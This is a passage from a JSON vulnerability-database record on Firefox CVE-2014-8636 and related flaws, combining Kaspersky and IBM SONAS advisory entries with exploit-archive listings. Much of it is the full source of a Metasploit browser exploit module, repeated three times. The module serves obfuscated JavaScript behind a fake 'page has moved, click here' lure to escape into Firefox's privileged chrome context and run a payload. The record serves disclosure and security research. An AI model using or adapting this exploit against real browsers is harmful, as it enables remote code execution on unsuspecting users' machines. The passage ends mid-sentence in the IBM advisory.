"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2020-06-03T00:00:00", "id": "KLA10445", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10445/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T16:16:51", "description": "### *Detect date*:\n01/13/2015\n\n### *Severity*:\nHigh\n\n### *Description*:\nImproper interpretation of HTTP headers was found in Mozilla products. By exploiting this vulnerability malicious users can inject cookie. This vulnerability can be exploited via specially designed HTTP headers.\n\n### *Affected products*:\nMozilla Firefox earlier than 35 \nMozilla Firefox ESR earlier than 31.4 \nMozilla SeaMonkey earlier than 2.32 \nMozilla Thunderbird earlier than 31.4\n\n### *Solution*:\nUpdate to latest version \n[Get Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>) \n[Get Firefox](<https://www.mozilla.org/en-US/firefox/new/>) \n[Get SeaMonkey](<http://www.seamonkey-project.org/releases/>)\n\n### *Original advisories*:\n[MFSA](<https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/>) \n\n\n### *Impacts*:\nCI \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2014-8639](<https://vulners.com/cve/CVE-2014-8639>)6.8High", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "kaspersky", "title": "KLA10446 CI vulnerability in Mozilla products", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8639"], "modified": "2020-06-03T00:00:00", "id": "KLA10446", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10446/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:29", "description": "", "cvss3": {}, "published": "2015-03-24T00:00:00", "type": "packetstorm", "title": "Firefox Proxy Prototype Privileged Javascript Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8636"], "modified": "2015-03-24T00:00:00", "id": "PACKETSTORM:130972", "href": "https://packetstormsecurity.com/files/130972/Firefox-Proxy-Prototype-Privileged-Javascript-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'rex/exploitation/jsobfu' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \ninclude Msf::Exploit::Remote::BrowserAutopwn \ninclude Msf::Exploit::Remote::FirefoxPrivilegeEscalation \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', \n'Description' => %q{ \nThis exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect \ncomponent and gaining a reference to the privileged chrome:// window. This exploit \nrequires the user to click anywhere on the page to trigger the vulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'joev' # discovery and metasploit module \n], \n'DisclosureDate' => \"Jan 20 2014\", \n'References' => [ \n['CVE', '2014-8636'], \n['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], \n['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] \n \n], \n'Targets' => [ \n[ \n'Universal (Javascript XPCOM Shell)', { \n'Platform' => 'firefox', \n'Arch' => ARCH_FIREFOX \n} \n], \n[ \n'Native Payload', { \n'Platform' => %w{ java linux osx solaris win }, \n'Arch' => ARCH_ALL \n} \n] \n], \n'DefaultTarget' => 0, \n'BrowserRequirements' => { \n:source => 'script', \n:ua_name => HttpClients::FF, \n:ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } \n} \n)) \n \nregister_options([ \nOptString.new('CONTENT', [ false, \"Content to display inside the HTML <body>.\" ]) \n], self.class) \nend \n \ndef on_request_exploit(cli, request, target_info) \nsend_response_html(cli, generate_html(target_info)) \nend \n \ndef default_html \n\"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected.\" \nend \n \ndef generate_html(target_info) \nkey = Rex::Text.rand_text_alpha(5 + rand(12)) \nframe = Rex::Text.rand_text_alpha(5 + rand(12)) \nr = Rex::Text.rand_text_alpha(5 + rand(12)) \nopts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin \n \njs = js_obfuscate %Q| \nvar opts = #{JSON.unparse(opts)}; \nvar key = opts['#{key}']; \nvar props = {}; \nprops.has = function(n){ \nif (!window.top.x && n=='nodeType') { \nwindow.top.x=window.open(\"chrome://browser/content/browser.xul\", \"x\", \n\"chrome,,top=-9999px,left=-9999px,height=100px,width=100px\"); \nif (window.top.x) { \nObject.setPrototypeOf(document, pro); \nsetTimeout(function(){ \nx.location='data:text/html,<iframe mozbrowser src=\"about:blank\"></iframe>'; \n \nsetTimeout(function(){ \nx.messageManager.loadFrameScript('data:,'+key, false); \nsetTimeout(function(){ \nx.close(); \n}, 100) \n}, 100) \n}, 100); \n} \n} \n} \nvar pro = Object.getPrototypeOf(document); \nObject.setPrototypeOf(document, Proxy.create(props)); \n| \n \n%Q| \n<!doctype html> \n<html> \n<body> \n<script> \n#{js} \n</script> \n#{datastore['CONTENT'] || default_html} \n</body> \n</html> \n| \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130972/firefox_proxy_prototype.rb.txt"}], "metasploit": [{"lastseen": "2023-02-09T10:29:34", "description": "This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.\n", "cvss3": {}, "published": "2015-03-23T18:44:41", "type": "metasploit", "title": "Firefox Proxy Prototype Privileged Javascript Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8636"], "modified": "2022-02-16T23:22:40", "id": "MSF:EXPLOIT-MULTI-BROWSER-FIREFOX_PROXY_PROTOTYPE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/firefox_proxy_prototype/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/exploitation/jsobfu'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection',\n 'Description' => %q{\n This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect\n component and gaining a reference to the privileged chrome:// window. This exploit\n requires the user to click anywhere on the page to trigger the vulnerability.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'joev' # discovery and metasploit module\n ],\n 'DisclosureDate' => '2014-01-20',\n 'References' => [\n ['CVE', '2014-8636'], # proxy injection\n ['CVE', '2015-0802'], # can access messageManager property in chrome window\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],\n ['URL', 'https://www.rapid7.com/blog/post/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]\n\n ],\n 'Targets' => [\n [\n 'Universal (Javascript XPCOM Shell)', {\n 'Platform' => 'firefox',\n 'Arch' => ARCH_FIREFOX\n }\n ],\n [\n 'Native Payload', {\n 'Platform' => %w{ java linux osx solaris win },\n 'Arch' => ARCH_ALL\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'BrowserRequirements' => {\n :source => 'script',\n :ua_name => HttpClients::FF,\n :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) }\n }\n ))\n\n register_options([\n OptString.new('CONTENT', [ false, \"Content to display inside the HTML <body>.\" ])\n ])\n end\n\n def on_request_exploit(cli, request, target_info)\n send_response_html(cli, generate_html(target_info))\n end\n\n def default_html\n \"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected.\"\n end\n\n def generate_html(target_info)\n key = Rex::Text.rand_text_alpha(5 + rand(12))\n frame = Rex::Text.rand_text_alpha(5 + rand(12))\n r = Rex::Text.rand_text_alpha(5 + rand(12))\n opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin\n\n js = js_obfuscate %Q|\n var opts = #{JSON.unparse(opts)};\n var key = opts['#{key}'];\n var props = {};\n props.has = function(n){\n if (!window.top.x && n=='nodeType') {\n window.top.x=window.open(\"chrome://browser/content/browser.xul\", \"x\",\n \"chrome,,top=-9999px,left=-9999px,height=100px,width=100px\");\n if (window.top.x) {\n Object.setPrototypeOf(document, pro);\n setTimeout(function(){\n x.location='data:text/html,<iframe mozbrowser src=\"about:blank\"></iframe>';\n\n setTimeout(function(){\n x.messageManager.loadFrameScript('data:,'+key, false);\n setTimeout(function(){\n x.close();\n }, 100)\n }, 100)\n }, 100);\n }\n }\n }\n var pro = Object.getPrototypeOf(document);\n Object.setPrototypeOf(document, Proxy.create(props));\n |\n\n %Q|\n <!doctype html>\n <html>\n <body>\n <script>\n #{js}\n </script>\n #{datastore['CONTENT'] || default_html}\n </body>\n </html>\n |\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/firefox_proxy_prototype.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-08-16T08:24:44", "description": "", "cvss3": {}, "published": "2015-03-24T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox - Proxy Prototype Privileged JavaScript Injection (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2014-8636", "CVE-2014-8636"], "modified": "2015-03-24T00:00:00", "id": "EDB-ID:36480", "href": "https://www.exploit-db.com/exploits/36480", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex/exploitation/jsobfu'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection',\r\n 'Description' => %q{\r\n This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect\r\n component and gaining a reference to the privileged chrome:// window. This exploit\r\n requires the user to click anywhere on the page to trigger the vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'joev' # discovery and metasploit module\r\n ],\r\n 'DisclosureDate' => \"Jan 20 2014\",\r\n 'References' => [\r\n ['CVE', '2014-8636'],\r\n ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],\r\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]\r\n\r\n ],\r\n 'Targets' => [\r\n [\r\n 'Universal (Javascript XPCOM Shell)', {\r\n 'Platform' => 'firefox',\r\n 'Arch' => ARCH_FIREFOX\r\n }\r\n ],\r\n [\r\n 'Native Payload', {\r\n 'Platform' => %w{ java linux osx solaris win },\r\n 'Arch' => ARCH_ALL\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::FF,\r\n :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) }\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('CONTENT', [ false, \"Content to display inside the HTML <body>.\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n send_response_html(cli, generate_html(target_info))\r\n end\r\n\r\n def default_html\r\n \"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected.\"\r\n end\r\n\r\n def generate_html(target_info)\r\n key = Rex::Text.rand_text_alpha(5 + rand(12))\r\n frame = Rex::Text.rand_text_alpha(5 + rand(12))\r\n r = Rex::Text.rand_text_alpha(5 + rand(12))\r\n opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin\r\n\r\n js = js_obfuscate %Q|\r\n var opts = #{JSON.unparse(opts)};\r\n var key = opts['#{key}'];\r\n var props = {};\r\n props.has = function(n){\r\n if (!window.top.x && n=='nodeType') {\r\n window.top.x=window.open(\"chrome://browser/content/browser.xul\", \"x\",\r\n \"chrome,,top=-9999px,left=-9999px,height=100px,width=100px\");\r\n if (window.top.x) {\r\n Object.setPrototypeOf(document, pro);\r\n setTimeout(function(){\r\n x.location='data:text/html,<iframe mozbrowser src=\"about:blank\"></iframe>';\r\n\r\n setTimeout(function(){\r\n x.messageManager.loadFrameScript('data:,'+key, false);\r\n setTimeout(function(){\r\n x.close();\r\n }, 100)\r\n }, 100)\r\n }, 100);\r\n }\r\n }\r\n }\r\n var pro = Object.getPrototypeOf(document);\r\n Object.setPrototypeOf(document, Proxy.create(props));\r\n |\r\n\r\n %Q|\r\n <!doctype html>\r\n <html>\r\n <body>\r\n <script>\r\n #{js}\r\n </script>\r\n #{datastore['CONTENT'] || default_html}\r\n </body>\r\n </html>\r\n |\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/36480", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-13T09:36:52", "description": "## Summary\n\nThere are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.3.0.0 to 1.5.1.0 of SONAS\n\n## Vulnerability Details\n\n \nIBM SONAS is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla Firefox shipped in certain versions of IBM SONAS. This vulnerability concerns the potential ability of a remote attacker to execute arbitrary code on a vulnerable system or cause a denial of service. \n \n**CVEID: **[CVE-2014-1574](<https://vulners.com/cve/CVE-2014-1574>) \n**DESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97001> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID: **[CVE-2014-1576](<https://vulners.com/cve/CVE-2014-1576>) \n**DESCRIPTION:** Mozilla Firefox is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the nsTransformedTextRun() function when making capitalization style changes during CSS parsing. By using unknown attack vectors, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97003> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID: **[CVE-2014-1577](<https://vulners.com/cve/CVE-2014-1577>) \n**DESCRIPTION: **Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds read in mozilla::dom::OscillatorNodeEngine::ComputeCustom() in Web Audio when interacting with custom waveforms with invalid values. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97004> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID:** [CVE-2014-1578](<https://vulners.com/cve/CVE-2014-1578>) \n**DESCRIPTION: **Mozilla Firefox is vulnerable to a denial of service, caused by an out-of-bounds write error in get_tile() when buffering WebM format video containing frames with invalid tile sizes. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97005> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n \n \n**CVEID: **[CVE-2014-1581](<https://vulners.com/cve/CVE-2014-1581>) \n**DESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free during text layout. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97011> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID: **[CVE-2014-1583](<https://vulners.com/cve/CVE-2014-1583>) \n**DESCRIPTION: **Mozilla Firefox could allow a remote attacker to bypass cross-domain security restrictions. By invoking the AlarmAPI, an attacker could bypass same-origin policy restrictions to read the values of cross-origin references in the alarm's JSON data. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/97012> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:P/A:N) \n \n \n**CVEID: **[CVE-2014-1587](<https://vulners.com/cve/CVE-2014-1587>) \n**DESCRIPTION: **Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/99059> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID:** [CVE-2014-1588](<https://vulners.com/cve/CVE-2014-1588>) \n**DESCRIPTION:** Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 9.300 \nCVSS Temporal Score: <http://xforce.iss.net/xforce/xfdb/99060> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n \n**CVEID:** [CVE-2014-1590](<https://vulners.com/cve/CVE-2014-1590>) \n**DESCRIPTION:** Mozilla Firefox is vulnerable to a denial of service, caused by an error when passing a JavaScript object to XMLHttpRequest. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/99062> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n \n \n**CVEID:** [CVE-2014-1592](<https://vulners.com/cve/CVE-2014-1592>) \n**DESCRIPTION:** Mozilla Firefox is vulnerable to a denial of service, caused by a use-after-free while parsing HTML5 written to a document. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/99064> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n \n \n**CVEID: **[CVE-2014-1593](<https://vulners.com/cve/CVE-2014-1593>) \n**DESCRIPTION:** Mozilla Firefox is vulnerable to a buffer overflow, caused by improper bounds checking when parsing media content. By persuading a victim to visit a specially-crafted Web site, a remote attacker could overflow a b
Firefox regression
